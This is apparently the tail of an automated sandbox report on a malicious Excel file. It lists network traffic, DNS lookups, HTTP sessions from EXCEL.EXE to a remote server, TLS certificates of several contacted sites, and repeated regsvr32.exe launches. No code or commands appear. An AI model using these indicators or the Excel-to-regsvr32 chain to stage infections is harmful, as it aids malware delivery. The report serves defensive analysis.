Apr 9, 2021 16:32:51.418953896 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418968916 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418983936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418989897 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.419001102 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.419024944 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.419064999 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.566822052 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.566852093 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.566864014 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.566876888 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567084074 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567210913 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567241907 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567276955 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567287922 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567303896 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567322969 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567349911 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567365885 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567398071 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567420006 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567433119 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567475080 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567488909 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567492008 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567508936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567527056 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567547083 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567550898 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567565918 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567580938 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567580938 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567648888 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567724943 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567780972 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567823887 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567852974 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567868948 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567893028 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567907095 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567908049 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567936897 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.567938089 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567970991 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.567994118 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568006039 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568022966 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568051100 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568068981 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568082094 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568099976 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568103075 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568118095 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568130970 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568135977 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568152905 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568181992 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.568239927 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.568295002 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.577044964 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.724872112 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:51.726483107 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.887449026 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:51.887571096 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:51.888139963 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.048655987 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.054092884 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.054116964 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.054127932 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.054191113 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.054413080 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.068753004 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.229655981 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.229747057 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.230861902 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.435995102 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.817079067 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.817186117 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.817459106 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
Apr 9, 2021 16:32:52.817528009 CEST | 49709 | 443 | 192.168.2.5 | 67.222.38.97 |
Apr 9, 2021 16:32:52.847177029 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.020139933 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.021712065 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.022327900 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.194963932 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.195327997 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.195377111 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.195414066 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.195450068 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.195480108 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.195554972 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.195559978 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.197325945 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.201728106 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.234844923 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.407876015 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.408828974 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.409564972 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.625683069 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.689618111 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.689646006 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:32:53.689744949 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.690171957 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:32:53.862592936 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:33:22.817353964 CEST | 443 | 49709 | 67.222.38.97 | 192.168.2.5 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 9, 2021 16:32:33.274650097 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:33.288738012 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:33.471756935 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:33.484988928 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:34.134174109 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:34.148879051 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:35.371589899 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:35.385628939 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:36.164657116 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:36.182590008 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:36.822885036 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:36.835565090 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:37.795372963 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:37.808442116 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:38.639306068 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:38.652040005 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:44.875857115 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:44.893810987 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:45.739701033 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:45.752399921 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:45.848380089 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:45.895380020 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:46.233835936 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:46.266985893 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:47.235687017 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:47.249058962 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:48.235239029 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:48.269509077 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:49.100858927 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:49.116050959 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:49.320487022 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:49.617819071 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:50.028651953 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:50.035092115 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:50.041322947 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:50.048213959 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:50.248240948 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:50.262741089 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:50.468092918 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:50.628273964 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:51.603812933 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:51.722814083 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:52.824796915 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:52.844868898 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:32:54.264189959 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:32:54.278040886 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:04.091212988 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:04.278136969 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:05.660773993 CEST | 59736 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:05.660993099 CEST | 51058 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:05.661112070 CEST | 52636 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:05.673764944 CEST | 53 | 51058 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:05.673964024 CEST | 53 | 52636 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:05.673985004 CEST | 53 | 59736 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:06.644540071 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:06.658512115 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:06.809588909 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:06.828172922 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:07.964963913 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:07.995057106 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:09.542166948 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:09.554812908 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:17.899082899 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:17.918118954 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:27.776884079 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:27.789747953 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:46.730371952 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:46.743416071 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:33:58.165067911 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:33:58.186606884 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:34:07.641311884 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:34:07.654872894 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5 |
Apr 9, 2021 16:34:16.440901041 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 9, 2021 16:34:16.468780994 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 9, 2021 16:32:49.320487022 CEST | 192.168.2.5 | 8.8.8.8 | 0x19d7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:32:50.035092115 CEST | 192.168.2.5 | 8.8.8.8 | 0x62ad | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:32:50.468092918 CEST | 192.168.2.5 | 8.8.8.8 | 0x4440 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:32:51.603812933 CEST | 192.168.2.5 | 8.8.8.8 | 0xfd97 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:32:52.824796915 CEST | 192.168.2.5 | 8.8.8.8 | 0xa4e4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:32:49.617819071 CEST | 8.8.8.8 | 192.168.2.5 | 0x19d7 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:32:50.048213959 CEST | 8.8.8.8 | 192.168.2.5 | 0x62ad | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:32:50.628273964 CEST | 8.8.8.8 | 192.168.2.5 | 0x4440 | No error (0) | 162.251.80.27 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:32:51.722814083 CEST | 8.8.8.8 | 192.168.2.5 | 0xfd97 | No error (0) | 67.222.38.97 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:32:52.844868898 CEST | 8.8.8.8 | 192.168.2.5 | 0xa4e4 | No error (0) | 173.201.252.173 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:33:06.828172922 CEST | 8.8.8.8 | 192.168.2.5 | 0x7ad2 | No error (0) | 104.18.25.243 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:33:06.828172922 CEST | 8.8.8.8 | 192.168.2.5 | 0x7ad2 | No error (0) | 104.18.24.243 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49705 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:32:49.638366938 CEST | 1231 | OUT | |
Apr 9, 2021 16:32:50.025616884 CEST | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.5 | 49707 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:32:50.068398952 CEST | 1238 | OUT | |
Apr 9, 2021 16:32:50.458079100 CEST | 1243 | IN |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:32:50.934982061 CEST | 162.251.80.27 | 443 | 192.168.2.5 | 49708 | CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Apr 9, 2021 16:32:52.054127932 CEST | 67.222.38.97 | 443 | 192.168.2.5 | 49709 | CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Apr 9, 2021 16:32:53.197325945 CEST | 173.201.252.173 | 443 | 192.168.2.5 | 49710 | CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |||||||
CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 16:32:44 |
Start date: | 09/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x290000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:32:53 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12f0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:32:53 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12f0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:32:53 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12f0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:32:54 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12f0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:32:55 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7ff797770000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|